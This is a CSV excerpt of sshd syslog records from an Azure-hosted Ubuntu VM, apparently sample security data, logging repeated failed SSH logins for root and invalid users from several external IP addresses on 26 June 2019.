+5551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:24:32,UbuntuDevEnv,2019-06-26 16:24:32,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 52952 ssh2,35337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,52952,,
+5552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:24:32,UbuntuDevEnv,2019-06-26 16:24:32,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 52952 [preauth],35337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,52952,,
+5553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:24:32,UbuntuDevEnv,2019-06-26 16:24:32,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 52952:11: Normal Shutdown, Thank you for playing [preauth]",35337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,52952,,
+5554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:01,UbuntuDevEnv,2019-06-26 16:25:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:03,UbuntuDevEnv,2019-06-26 16:25:02,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 56236 ssh2,35442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,56236,,
+5556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:03,UbuntuDevEnv,2019-06-26 16:25:03,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 56236:11: Normal Shutdown, Thank you for playing [preauth]",35442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,56236,,
+5557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:03,UbuntuDevEnv,2019-06-26 16:25:03,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 56236 [preauth],35442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,56236,,
+5558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:06,UbuntuDevEnv,2019-06-26 16:25:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.128.79.169  user=root,35470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,178.128.79.1,,0,
+5559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:08,UbuntuDevEnv,2019-06-26 16:25:07,auth,UbuntuDevEnv,info,Failed password for root from 178.128.79.169 port 53486 ssh2,35470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.128.79.1,53486,,
+5560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:08,UbuntuDevEnv,2019-06-26 16:25:07,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 178.128.79.169 port 53486 [preauth],35470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,178.128.79.1,53486,,
+5561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:08,UbuntuDevEnv,2019-06-26 16:25:07,auth,UbuntuDevEnv,info,"Received disconnect from 178.128.79.169 port 53486:11: Normal Shutdown, Thank you for playing [preauth]",35470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.128.79.1,53486,,
+5562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:12,UbuntuDevEnv,2019-06-26 16:25:12,auth,UbuntuDevEnv,info,Invalid user lundi from 66.70.130.155 port 37998,35484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lundi,66.70.130.1,37998,,
+5563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:12,UbuntuDevEnv,2019-06-26 16:25:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:12,UbuntuDevEnv,2019-06-26 16:25:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,35484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:14,UbuntuDevEnv,2019-06-26 16:25:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:14,UbuntuDevEnv,2019-06-26 16:25:14,auth,UbuntuDevEnv,info,Failed password for invalid user lundi from 66.70.130.155 port 37998 ssh2,35484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lundi,66.70.130.1,37998,,
+5567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:14,UbuntuDevEnv,2019-06-26 16:25:14,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 37998:11: Bye Bye [preauth],35484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,37998,,
+5568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:14,UbuntuDevEnv,2019-06-26 16:25:14,auth,UbuntuDevEnv,info,Disconnected from invalid user lundi 66.70.130.155 port 37998 [preauth],35484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lundi,66.70.130.1,37998,,
+5569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:15,UbuntuDevEnv,2019-06-26 16:25:15,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 59532 ssh2,35498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,59532,,
+5570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:16,UbuntuDevEnv,2019-06-26 16:25:15,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 59532:11: Normal Shutdown, Thank you for playing [preauth]",35498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,59532,,
+5571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:16,UbuntuDevEnv,2019-06-26 16:25:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 59532 [preauth],35498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,59532,,
+5572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:20,UbuntuDevEnv,2019-06-26 16:25:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:23,UbuntuDevEnv,2019-06-26 16:25:22,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 34548 ssh2,35522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,34548,,
+5574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:23,UbuntuDevEnv,2019-06-26 16:25:22,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 34548 [preauth],35522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,34548,,
+5575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:23,UbuntuDevEnv,2019-06-26 16:25:22,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 34548:11: Normal Shutdown, Thank you for playing [preauth]",35522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,34548,,
+5576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:27,UbuntuDevEnv,2019-06-26 16:25:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:29,UbuntuDevEnv,2019-06-26 16:25:28,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 37838 ssh2,35551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,37838,,
+5578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:29,UbuntuDevEnv,2019-06-26 16:25:28,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 37838 [preauth],35551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,37838,,
+5579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:29,UbuntuDevEnv,2019-06-26 16:25:28,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 37838:11: Normal Shutdown, Thank you for playing [preauth]",35551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,37838,,
+5580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:34,UbuntuDevEnv,2019-06-26 16:25:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35580,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:35,UbuntuDevEnv,2019-06-26 16:25:35,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 41096 ssh2,35580,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,41096,,
+5582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:35,UbuntuDevEnv,2019-06-26 16:25:35,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 41096:11: Normal Shutdown, Thank you for playing [preauth]",35580,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,41096,,
+5583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:35,UbuntuDevEnv,2019-06-26 16:25:35,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 41096 [preauth],35580,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,41096,,
+5584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:40,UbuntuDevEnv,2019-06-26 16:25:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:42,UbuntuDevEnv,2019-06-26 16:25:41,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 44380 ssh2,35598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,44380,,
+5586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:42,UbuntuDevEnv,2019-06-26 16:25:41,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 44380 [preauth],35598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,44380,,
+5587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:42,UbuntuDevEnv,2019-06-26 16:25:41,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 44380:11: Normal Shutdown, Thank you for playing [preauth]",35598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,44380,,
+5588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:54,UbuntuDevEnv,2019-06-26 16:25:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:56,UbuntuDevEnv,2019-06-26 16:25:56,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 47648 ssh2,35640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,47648,,
+5590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:57,UbuntuDevEnv,2019-06-26 16:25:56,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 47648:11: Normal Shutdown, Thank you for playing [preauth]",35640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,47648,,
+5591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:25:57,UbuntuDevEnv,2019-06-26 16:25:56,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 47648 [preauth],35640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,47648,,
+5592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:17,UbuntuDevEnv,2019-06-26 16:26:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:20,UbuntuDevEnv,2019-06-26 16:26:19,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 50932 ssh2,35726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,50932,,
+5594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:20,UbuntuDevEnv,2019-06-26 16:26:19,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 50932:11: Normal Shutdown, Thank you for playing [preauth]",35726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,50932,,
+5595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:20,UbuntuDevEnv,2019-06-26 16:26:19,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 50932 [preauth],35726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,50932,,
+5596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:27,UbuntuDevEnv,2019-06-26 16:26:27,auth,UbuntuDevEnv,info,Invalid user craig from 80.108.220.67 port 59496,35755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,craig,80.108.220.6,59496,,
+5597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:27,UbuntuDevEnv,2019-06-26 16:26:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,35755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+5598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:27,UbuntuDevEnv,2019-06-26 16:26:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:29,UbuntuDevEnv,2019-06-26 16:26:29,auth,UbuntuDevEnv,info,Failed password for invalid user craig from 80.108.220.67 port 59496 ssh2,35755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,craig,80.108.220.6,59496,,
+5600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:29,UbuntuDevEnv,2019-06-26 16:26:29,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 59496:11: Bye Bye [preauth],35755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,59496,,
+5601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:29,UbuntuDevEnv,2019-06-26 16:26:29,auth,UbuntuDevEnv,info,Disconnected from invalid user craig 80.108.220.67 port 59496 [preauth],35755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,craig,80.108.220.6,59496,,
+5602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:32,UbuntuDevEnv,2019-06-26 16:26:31,auth,UbuntuDevEnv,info,Received disconnect from 159.65.150.212 port 43226:11: Bye Bye [preauth],35791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.150.2,43226,,
+5603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:32,UbuntuDevEnv,2019-06-26 16:26:31,auth,UbuntuDevEnv,info,Disconnected from 159.65.150.212 port 43226 [preauth],35791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.150.2,43226,,
+5604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:48,UbuntuDevEnv,2019-06-26 16:26:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:50,UbuntuDevEnv,2019-06-26 16:26:49,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 54234 ssh2,35842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,54234,,
+5606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:50,UbuntuDevEnv,2019-06-26 16:26:50,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 54234:11: Normal Shutdown, Thank you for playing [preauth]",35842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,54234,,
+5607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:26:50,UbuntuDevEnv,2019-06-26 16:26:50,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 54234 [preauth],35842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,54234,,
+5608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:10,UbuntuDevEnv,2019-06-26 16:27:09,auth,UbuntuDevEnv,info,Invalid user tom from 66.70.130.155 port 54976,35921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,66.70.130.1,54976,,
+5609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:27:10,UbuntuDevEnv,2019-06-26 16:27:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,35921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
